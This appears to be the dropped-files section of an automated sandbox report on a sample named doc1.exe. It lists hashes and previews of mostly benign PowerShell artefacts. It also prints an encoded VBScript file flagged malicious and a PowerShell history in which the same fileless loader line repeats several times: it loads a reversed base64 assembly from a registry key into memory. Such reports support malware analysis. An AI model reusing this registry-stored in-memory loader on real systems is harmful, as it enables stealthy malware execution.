                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:modified
                          Size (bytes):9713
                          Entropy (8bit):4.940954773740904
                          Encrypted:false
                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                          MD5:BA7C69EBE30EC7DA697D2772E36A746D
                          SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                          SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                          SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                          Malicious:false
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):3256
                          Entropy (8bit):5.418960443302548
                          Encrypted:false
                          SSDEEP:96:hEzlHxvIIwLz9qrh7Kf+oRJ5Eo9Adrxww:m1xAJErAfRLL27
                          MD5:4240CDBE4622A323637296FF70E79B21
                          SHA1:E6AC13310BDD89EEDFF7FA42953B1FAA9311F2DC
                          SHA-256:6EB07989159037D013B705021140641782270FFAD03059EB295A17D56C3B99CF
                          SHA-512:3C1F868D71DCE10E11C84A68A5AA42DDFB28AE30B31B64B759058DF8CF5C0F6E315A632379FFE3FF77CA4CB368FED17CE456CAA2AB9FE05A9A56C8D9532C0562
                          Malicious:false
                          Preview:@...e.................................L..............@..........H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2exqzvuo.cdn.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ox4kdpb.xhj.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41ttg5jc.s4m.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dx5gnav.uwz.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a5ntv2u2.abr.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ah1i0yoj.pdx.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cc0fmre0.rv0.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccbx03of.d2f.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ciewq43x.cbp.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kh5jnd1q.au2.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnbriqn5.1f5.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prkdvemx.4w3.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rebom5ay.t4g.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tju4kw2q.bm2.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\msb.vbe

                          Download File
                          Process:C:\Users\user\Desktop\doc1.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):13730
                          Entropy (8bit):3.9144782000199303
                          Encrypted:false
                          SSDEEP:384:JEMYUlp+y4DdVWrXDL6SuvTra0qtRFWSBQXbH:KIp+y4ZYvGVvT3qtKYQT
                          MD5:49B536466D2D4C84BBC92F01D2EA766F
                          SHA1:AB15AC73D984AEE741F2ED5E169C734FD3ADB673
                          SHA-256:2C7BED584F136B6FAC5820FD762D377A550D7E31EB35B66CF61818ECAF177E23
                          SHA-512:B4F2585CFACD11C948772DC4BC34A5CBA3D8113761852C88E2BA23EF4AB1EF50DA28C155DE711264D735D895DFB321017CCE22FD89F39D3089A3D60DF9A2ECCC
                          Malicious:true
                          Preview:..#.@.~.^.t.x.o.A.A.A.=.=.v.6.1.i.z.K.k.S.M.k.V...2.I.a.x.@.#.@.&.}.w.O.r.K.x.P.A.a.w.^.k.m.b.O.@.#.@.&.@.#.@.&.E.P.].W.;.O.b.x.n.P.a...k...m.r.2.m.V.+.~.l.,.2.a.....m.!.O.b.W.U.,.N.!.P./.1.D.b.2.Y.@.#.@.&.j.E.(.P.3.a...m.E.D.n.D.U.m.D.b.2.O.n.M.k...m.r.w.C.s.v.#.@.#.@.&.,.~.P.,.f.r.h.,./.X.d.O...:.n.?.4.n.^.V.S.,.m.4.+.:.b.x.w.r.m.4.k.n.D.A.x...n.T.k./.D...+.s.+.x.D.S.~.m.4.+.s.k.U.f.;.j.1.D.r.w.D.@.#.@.&.,.P.~.~.G.k.:.~.[.K.x.U.+...d.U.+.L.s.+...Y.+.../.B.~.w.m.D.O.k...f.n.8.!.Y.~.,.2.l.M.Y.k...j.;.k.D.+.@.#.@.&.@.#.@.&.~.~.,.P.j.+.D.~./.H./.O.n.s.+.?.4.n.^.V.~.'.,./.M.+.C.D.+.}.4.L...m.D.c.J.q.?.^.D.b.w.O. .U.t.+.^.s.J.*.@.#.@.&.,.~.~.P.1.t...:.r.x.o.r.1.t.r.+.M.3.x.M.+.L.r.k.Y.D.n.h...x.O.P.{.~.r.0.H.`.b.:./.S.V./.^.n.w.".w.U.J.@.#.@.&.~.~.,.P.m.4.n.:.b.x.f.!.j.^.D.b.w.D.P.x.P.6.8.D.+.U.k.M./.t...:.r.U.G.E.?.^...b.w.O.`.k.z.k.Y.n.s.+.U.t.+.^.V.B.~.m.4.+.h.k...s.r.^.4.k.+.M.3.x.M.+.o.b.d.O.D...:...x.O.#.@.#.@.&.,.P.~.P.@.#.@.&.P.,.P.~.v.,.f.....0.r.U.b.Y.r.W...~.9.+.d.,.m.K.x.Y...x.

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1260
                          Entropy (8bit):5.397777491503
                          Encrypted:false
                          SSDEEP:24:X2EQWEy2LdR2O2EQWEy2LdR2O2EQWEy2LdR2O2EQWEy2LdR2O2EQWEy2LdR2o:XiW0WOiW0WOiW0WOiW0WOiW0Wo
                          MD5:A72B2DAAD164C0F773B682CA6CFF0E08
                          SHA1:0296389E7CDA8E3324F48ED84E62E7C11D8AC57F
                          SHA-256:D2AD0D84932290A3D007F2955041F7A60BC00E709DCDEB1065C56968A8E1B748
                          SHA-512:979680721D158B4AAA2C8A46357411C6B0BF58A3A4F41A6D79358D64A05AA0F961BFF15D8DB2A64E31E346B525393BE96366D3809CC20E04A59FF4458F70926E
                          Malicious:false
                          Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost -Force..[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\fNUATsLGslepRpn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('fNUATsLGslepRpn')..Stop-Process -Name conhost

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\227T1CRS3RKN7JOFY40N.temp

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.7262273362286513
                          Encrypted:false
                          SSDEEP:96:/f/3CLT9kvhkvCCt3rZ8X2BHYrZ8X2BHA:/fcF3rZS/rZSt
                          MD5:2AFAF2863A6D11F22076E3C5E80C62DF
                          SHA1:6D93FD21A0FF6640AA407E2702208FE5260114D3
                          SHA-256:1FA7AC1B43E8FDEF1AEC2B11D27569B5753D5E75CDECDFBF8F3FB67AC6570EFE
                          SHA-512:8BD5BEE72C27C439D3A8D14751A19D379C2A3EB4A1316848F2EFFB9C58AF0ED851EE32487D5BEEB7E103DF387DD1BD1EFAC5882C1B7F25F2308DA02270BFD2F2
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S...{..e....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W.....e..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1......Yl...Windows.@......EW<2.Yr.....2.....................KZ .W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2.Yj.....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF55e0dd.TMP (copy)

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF561e05.TMP (copy)

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6224
                          Entropy (8bit):3.724700997052021
                          Encrypted:false
                          SSDEEP:96:tyi3CLT9kvhkvCCt3rZ8X2zHYrZ8X2BHA:tyTF3rZSNrZSt
                          MD5:ADE0008792CFA0A656D421CB90D2FE99
                          SHA1:0B09926CEA635AF41556AC19E4B7FA0237BC159D
                          SHA-256:1347162096E503325C8FB2CBD1D4F7E1C587BDB59562056F3B81982CEE7C3EEC
                          SHA-512:3AAC4D081E76956AE7C9C917848E738882CD474C74E13C4AEBDDF116F096E77CC2618546F27D6BCCC81186AA21610C26710FC98F8218C7BD5EE33A985AF91546
                          Malicious:false
                          Preview:...................................FL..................F.".. ...J.S.....pe....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S.....3W....QU.e........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y`............................^.A.p.p.D.a.t.a...B.V.1......Yi...Roaming.@......EW<2.Yi...../.....................2.%.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.YY.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.YY.....2.......................L.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.YY.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.YY.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yj.....u...........

